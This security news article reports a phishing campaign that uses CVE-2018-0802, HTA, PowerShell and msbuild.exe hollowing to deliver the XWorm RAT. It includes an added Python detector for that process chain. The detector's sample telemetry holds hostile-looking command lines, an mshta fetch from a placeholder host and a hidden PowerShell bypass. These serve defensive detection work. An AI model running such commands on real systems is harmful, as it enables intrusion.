Phishing campaign chains old Office flaw with fileless XWorm RAT to evade detection


Fortinet researchers have disclosed a new phishing campaign delivering the commercially available XWorm malware, chaining a years-old Microsoft Office vulnerability with fileless execution to escape detection.

The campaign, which uses multi-themed phishing emails and a malicious Excel add-in, ultimately deploys the modular remote access trojan (RAT), which is capable of encrypted command-and-control (C2) and plugin-based expansion.

“This campaign is striking in its ordinariness,” said Shane Barney, chief information security officer at Keeper Security. “There’s no breakthrough technique here. It’s a clean execution chain built from components we’ve all seen before. The sophistication isn’t in the novelty, it’s in the assembly.”

Attackers used a phishing email carrying a malicious Excel add-in that exploits CVE-2018-0802, a memory corruption flaw in Office patched in 2018. The chain then continues through HTA and PowerShell-based execution to load the remaining components.

Attackers used a familiar entry point

According to a Fortinet blog post, the campaign relies on business-themed phishing lures and the legacy remote code execution vulnerability in the Microsoft Equation Editor that defenders have known for years. Fortinet noted that the continued success of CVE-2018-0802 suggests patching gaps remain a viable attack surface.

Jason Soroko, senior fellow at Sectigo, said the pairing of routine phishing with modern backend tradecraft is what makes the campaign notable.

“What stands out here is how ‘old’ and ‘routine’ the front end is, and how modern the back end remains,” he said. “The lure is a familiar business pretexting and a malicious Excel add-in, but the real signal is the attacker’s confidence that legacy Office exploit paths still convert at scale. The attachment abuses CVE-2018-0802, then pivots quickly into HTA plus PowerShell to keep the heavy lifting off disk.”

Fortinet researchers added that the remote code privileges gained through CVE-2018-0802 further allow execution of HTA and PowerShell components, keeping much of the activity off disk. “That combination is a reminder that patch hygiene and macro or script execution policy are still doing more real work than most organizations want to admit,” Soroko added.

Fileless .NET stage and a modular XWorm core

Beyond initial access, Fortinet observed a fileless .NET stage loaded directly into memory, followed by process hollowing into msbuild.exe, a legitimate Microsoft build tool capable of executing .NET code. The choice of msbuild.exe aligns with the malware’s runtime requirements while helping it blend into normal system activity.

“A fileless .NET stage loaded in memory, followed by process hollowing into msbuild.exe, is a clean ‘blend in’ move that leverages a legitimate .NET-capable binary and complicates attribution for simplistic detections,” Soroko said. “Fortinet’s rationale for msbuild.exe is especially useful for defenders because it ties the LOLBin choice to the malware’s .NET runtime needs, not just generic masquerading.”
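The execution chain described above (Office exploit, then HTA and PowerShell, then msbuild.exe as the hollowed host) leaves a parent-child trail in process-creation telemetry. The following is an added example, not code from Fortinet's report or the article: a small Python detector over constructed Sysmon-style process-creation records. It assumes only image path, PID, parent PID and command line, and treats eqnedt32.exe (the Equation Editor host process) as an Office parent.

```python
"""Flag the Office -> script host -> msbuild.exe chain in process-creation records (added example)."""
from dataclasses import dataclass

# eqnedt32.exe is the Equation Editor host; CVE-2018-0802 is exploited inside it.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe"}
PROJECT_EXTS = (".proj", ".csproj", ".vbproj", ".sln", ".targets")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process image
    cmdline: str    # command line of the new process


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return (rule, pid) pairs for events matching a stage of the described chain."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pname = _basename(parent.image) if parent else ""
        name = _basename(e.image)
        # Stage 1/2: an Office process (or the Equation Editor) launching an HTA or PowerShell host.
        if pname in OFFICE_PARENTS and name in SCRIPT_HOSTS:
            hits.append(("office_spawns_script_host", e.pid))
        if name == "msbuild.exe":
            # Stage 3: a script host starting msbuild.exe, the hollowing target named in the report.
            if pname in SCRIPT_HOSTS:
                hits.append(("script_host_spawns_msbuild", e.pid))
            # A real build passes a project or solution; a hollowed shell typically has no such argument.
            if not any(tok.lower().endswith(PROJECT_EXTS) for tok in e.cmdline.split()):
                hits.append(("msbuild_without_project", e.pid))
    return hits


# Constructed sample telemetry (not real campaign data): one malicious chain and one benign build.
SAMPLE_EVENTS = [
    ProcEvent(101, 20, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", "EQNEDT32.EXE -Embedding"),
    ProcEvent(102, 101, r"C:\Windows\System32\mshta.exe", "mshta.exe http://EXAMPLE-HOST/stage.hta"),
    ProcEvent(103, 102, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -w hidden -ep bypass -c ..."),
    ProcEvent(104, 103, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "MSBuild.exe"),
    ProcEvent(200, 20, r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "devenv.exe"),
    ProcEvent(201, 200, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "MSBuild.exe App.csproj /t:Build"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The benign devenv.exe build with a .csproj argument produces no hit, while the constructed chain fires once at the script-host stage and twice at the msbuild.exe stage.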

Once active, XWorm communicates with its C2 using AES-encrypted packets, and its core supports a broad plugin ecosystem. That modularity, the researchers noted, expands its capabilities beyond remote access, enabling credential theft, data exfiltration, disruption, and modernization paths depending on what the operator wants.

Fortinet said XWorm supports a wide range of operator commands, including system control (CLOSE, uninstall, update), file download and execution (DW, LN), plugin loading, screenshot capture ($Cap), keylogger retrieval, DDoS control, and shutdown or restart functions. The disclosure also listed indicators of compromise tied to the campaign, including phishing URLs and domains used to host HTA and loader files, the C2 server, file hashes for the malicious Excel attachment, and the final XWorm payload.

Barney emphasized that the broader risk hinges less on the malware label and more on post-compromise controls. “Campaigns like this expose a simple reality: the entry vector is predictable. The tooling is commoditized. The only real variable is whether the environment limits what an intruder can do next,” he said.
